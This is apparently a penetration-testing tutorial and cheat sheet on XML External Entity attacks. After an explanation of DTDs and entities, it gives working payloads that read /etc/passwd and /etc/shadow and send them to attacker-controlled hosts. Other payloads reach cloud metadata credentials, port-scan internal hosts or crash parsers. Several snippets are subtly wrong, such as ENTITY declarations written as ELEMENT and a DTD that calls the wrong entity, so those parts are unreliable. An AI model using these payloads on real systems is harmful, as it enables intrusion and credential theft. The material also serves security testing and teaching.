Skip to content

XML External Entity (XXE)

XML External Entity attacks target XML parsers and can lead to information disclosure, server-side request forgery, and denial-of-service attacks.

What can you expect from an XXE vulnerability?

  • Read files from the OS
  • Perform SSRF
  • Port Scan internal resources
  • In some specific instances you may be able to get remote code execution

Structure of XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ELEMENT name ANY>
]>

<name>Blah</name>
  • This is the prolog: <?xml version="1.0" encoding="UTF-8"?>
  • The Document Type Definition (DTD): <!DOCTYPE name [ <!ELEMENT name ANY> ]>
  • The Document: <name>Blah</name>

Document Type Definition (DTD)

The DTD defines the structure of the XML document and the data it contains. A DTD can be defined in the XML document or loaded from an external source.

An example XML file with a DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ELEMENT name (first,last)>
  <!ELEMENT first (#PCDATA)>
  <!ELEMENT last (#PCDATA)>
]>

<name>
  <first>Trevor</first>
  <last>Jones</last>
</name>
  • !DOCTYPE name - this defines the root element of the document as name
  • !ELEMENT name (first,last) - this says that the name element must contain two child elements first and last
  • !ELEMENT first (#PCDATA) - this says the first element has to be of type Parsed Character Data
  • !ELEMENT last (#PCDATA) - this says the last element has to be of type Parsed Character Data

Entities

Entities can be thought of as a simple type of variable. You would use an entity to hold a reference to some information and then include the information by using the reference in the XML document. For example, imagine I wanted to include a copyright on a number of XML documents but I want to be able to edit that information in one place. In this case it would be best to define an external entity (more on this below) with the copyright information and then include that within the DTD and the XML document.

copyright.xml
<copyright:text>© 2022 Acme, Inc.</copyright:text>
document.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [
  <!ENTITY c SYSTEM "file:///copyright.xml">
]>
<copyright>&c;</copyright>

Entities can be defined and used within the DTD also:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ELEMENT fullName (#PCDATA)>
  <!ENTITY first "Trevor">
  <!ENTITY full "&first; Jones">
]>

<name>
  <fullName>&full;</fullName>
</name>

The XML parser will interpolate &full; and end up with: <fullName>Trevor Jones</fullName>

Internal Entity

An Internal Entity is an entity where its value is defined within the DTD. For example, in the following DTD, I have defined two internal entities and used them both within the XML document.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE fullName [
  <!ENTITY firstName "Trevor">
  <!ENTITY lastName "Jones">
]>
<fullName>&firstName; &lastName;</fullName>

External Entity

An entity is considered external if its value is not local to the XML document. All external entities must have the keyword SYSTEM in their definition before the URI. In the following example the file entity's value is obtained from another file. Because of this, file is considered an external entity.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example [ <!ENTITY file SYSTEM "file:///example.text"> ]>
<example>&file;</example>

External entities can also have their values loaded from remote sources. The following DTD declares an external entity named file that points to a URL.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example [ <!ENTITY file SYSTEM "http://example.com/index.html"> ]>
<example>&file;</example>
External Entity Protocols
libxml2 php java .Net
file Yes Yes Yes Yes
http Yes Yes Yes Yes
ftp Yes Yes Yes Yes
https Yes Yes
php Yes
compress.zlib Yes
compress.bzip2 Yes
data Yes
glob Yes
phar Yes
jar Yes
netdoc Yes
mailto Yes
gopher* Yes

*Only available in older versions of Java

PHP additional protocols
Scheme Extention Required
https openssl
ftps openssl
zip zip
ssh2.shell ssh2
ssh2.exec ssh2
ssh2.tunnel ssh2
ssh2.sftp ssh2
ssh2.scp ssh2
rar rar
ogg oggvorbis
expect expect

General Entity

General Entities are the most basic. They are defined with the syntax ELEMENT name "value". You can reference the general entities by prefixing an ampersand & and appending a semicolon ;.

General Entity Rules
  1. A General Entity cannot contain the definition of another entity.
  2. A General Entity must contain data that an XML parser can parse (e.g. <blah> would not be allowed because there is no closing </blah> tag.)
  3. A General Entity may be part of another entity definition but only if that entity will be used directly in the document.
Example

Here we store the long copyright string into an entity named copyright that we can refer to later in the document:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE site [
  <!ELEMENT url ANY>
  <!ELEMENT copyright "&#xA9; Trevor 123 This Address Lane, Milwuakee WI. 53201">
]>

<site>
  <url>http://thissite.com</url>
  <copyright>&copyright;</copyright>
</site>
Predefined General Entities
Entity Result Hex Decimal
&lt; < &#x3C; &#60;
&gt; > &#x3E; &#62;
&quot; " &#x22; &#34;
&apos; ' &#x27; &#39;
&amp; & &#x26; &#38;

Parameter Entity

Parameter entities are defined with the syntax ELEMENT % name "value" and can be referenced by prefixing a percent % and appending a semicolon ;. They are a bit more flexible than General Entities. For example a parameter entity can store the value of another entity:

<!ENTITY % outer "<!ENTITY inner 'Trevor'>">

Parameter entities do have their limitations though, the most important one is that parameter entities can only be defined and used within a DTD.

According to w3

The use of parameter entities in the internal subset is restricted as described below. ... In the internal DTD subset, parameter-entity references MUST NOT occur within markup declarations; they may occur where markup declarations can occur. (This does not apply to references that occur in external parameter entities or to the external subset.)

Parameter Entity Rules
  1. A Parameter Entity can contain the definition of another entity.
  2. A Parameter Entity cannot be used within the document.
Example
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ENTITY % parameter_entity "<!ENTITY general_entity 'Some Value'>">
  %parameter_entity;
]>
<name>&general_entity;</name>

XXE Attacks

Read System Files

We can use XXE to read system files. Here is the same attack that we have done previously but changed slightly so that the external DTD remains static:

<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://127.0.0.1:5000/?x=%file;'>">
%eval;
%exfil;

The following is an example of what we submit to the server. Using this format we can then use Burp intruder to replace the file entity value to a new location on each attempt.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % ext SYSTEM "http://ourserver.com/brute.dtd">
  %ext;
]>

<name></name>

For certain parsers we may be able to list the files in a directory. The following will work on some Java XML parsers:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "file:///etc/">]>

<todo>&xxe;</todo>

Port Scanning and Basic Server-Side Request Forgery (SSRF)

We can cause the system parsing the XML to perform HTTP requests against internal servers on different ports. For example the following exploit would cause the system to check if FTP is open on the IP 10.3.0.45:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "http://10.3.0.45:21">
]>

<doc>&xxe;</doc>

Using this approach we may be able to perform SSRF against internal targets.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>

<doc>&xxe;</doc>

Denial of Service

In this example we are going to try to overload the memory capabilities of the server by using interpolation to greatly increase the payloads footprint. This attack is called the Billion Laughs attack:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY a0 "lol" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>

We can see in the example that a general entity named a0 was created with the value of lol. Next, a general entity was created by interpolating a0 ten times. This is done over and over. In the real attack you would want to create as many interpolated entities as required to crash the server.

Retrieving Exploit Data When not Reflected

Blind XXE

Simple test to see if blind XXE may be possible:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "http://ourserver.com/">
]>

<todo>&xxe;</todo>

If we submit this and receive a DNS lookup or HTTP request we can assume that we may be able to extract data using a blind attack.

In the case where the results of the attack are not displayed to the user, we can still extract information. Take a look at the following DTD. It attempts to read the system file /etc/passwd and then uses that as a path parameter in a request to a URL:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY foo SYSTEM "file:///etc/passwd">
  <!ENTITY xxe SYSTEM "http://127.0.0.1:5000/&foo;">
]>

<todo>&xxe;</todo>

This type of attack will fail because it violates the General Entity Rule #3.

  1. A General Entity may be part of another entity definition but only if that entity will be used directly in the document.

In our case the foo entity is not used directly in the document so the XML parser will determine that the XML document is invalid. This is where Parameter Entities play a role. The following is the same exploit using an externally defined DTD:

<!DOCTYPE xxe [
  <!ENTITY % hostname SYSTEM "file:///etc/hostname">
  <!ENTITY % wrapper "<!ENTITY send SYSTEM 'http://ourserver.com/?%hostname;'>">
  %hostname;
  %send;
]>

Notice that we define three entities (hostname, wrapper and send) and that both wrapper and send are used within the DTD. If we host this DTD and then include it in our attack we can start to see the power of Parameter Entities:

<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://ourserver.com/external.dtd">
  %xxe;
]>

This will work for some files, but on files that contain a carriage return we will receive an error. More on how to overcome this in Using CDATA.

Error-based XXE

If the we cannot get a properly formatted XML response to show our exploit data, we may be able to cause an error to show what we are after. In this example we purposely cause an error in the XML formatting in hopes that we can see the error in the response. Notice the error entity points to a path that does not exist in the external DTD.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

We can use this external DTD in our exploit by referencing it:

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://localhost:5000/path_error.dtd">
    %ext;
]>
<message></message>

If the application shows verbose error messages, we may be able to retrieve the contents of the file directly from the response.

Another way to cause an error is to use a protocol that is invalid. For example, in the following we leave the protocol blank:

<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

Using Character Data (CDATA)

In some cases the data we want to retrieve will have characters that will break XML parsing. We can use CDATA to bypass this limitation. CDATA tells the XML parser to ignore the contents within the brackets. Your first instinct may be to try something like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ENTITY start "<![CDATA[">
  <!ENTITY content "file:///some/path/some/file.txt">
  <!ENTITY end "]]>">
]>

<name>&start; &content; &end;</name>

But this will fail because it violates the General Entity Rule #2:

  1. A General Entity must contain data that an XML parser can parse (e.g. <blah> would not be allowed because there is no closing </blah> tag.)

To successfully use CDATA to retrieve data that would cause an XML parser issues we need to create four Parameter Entities:

  1. The first Parameter Entity will be the content of the file we want to read.
  2. We will then set another equal to the start of our CDATA string.
  3. The third will be set to the end of the CDATA string.
  4. And finally a fourth will contain the General Entity which will tie all of those together.
<!ENTITY % file SYSTEM "file:///some/path/some/file.txt">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % wrapper "<!ENTITY all '%start;%file;%end;'>">
%wrapper;

With that external DTD hosted we can use that during our exploit:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
  <!ENTITY % ext SYSTEM "http://ourserver.com/cdata.dtd">
  %ext;
]>

<name>&all;</name>

XInclude Attacks

In some cases the application will not allow you to modify the DTD. You may still be able to achieve an XXE attack by using XInclude.

<example xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/hostname" />
</example>

Review the response and see if the server's hostname is included.

PHP URL Wrapper

If the application is PHP. It may be possible to Base64 the content before exfiltrating the data:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
<!ENTITY % ent "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker_server/?%file;'>">
%ent;
%exfiltrate;

FTP Protocol

You may be able to exfiltrate data using the FTP Protocol:

<!ENTITY % file SYSTEM "file:///etc/shadow">
<!ENTITY % ent "<!ENTITY &#x25; exfiltrate SYSTEM 'ftp://attacker_server:21/?%file;'>">
%ent;
%exfiltrate;

Finding XXE Vulnerabilities

Content-Type

An application will use the Content-Type header to identify the contents of the body. If you see a Content-Type of:

  • text/xml
  • application/xml

Then the server will process XML data. In some cases the current application will use JSON but will have legacy code that still processes XML. Simply reformat the data and change the Content-Type header to test.

I suggest that you first attempt a benign interpolation payload to validate that you can define entities using something like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY foo "Does this ">
  <!ENTITY bar "expand?">
]>

<todo>
  <description>&foo; &bar;</description>
  <category>Category</category>
</todo>

If the results show that both entities have been interpolated to Does this expand?. It is likely that the application is vulnerable to XXE.

Parsing Files

If the application parses files, it may be vulnerable to XXE attacks from the file types. For example svg, docx, pptx, xlxs all contain XML. If the server parses these documents it may be vulnerable.

Additional Resources

Back to top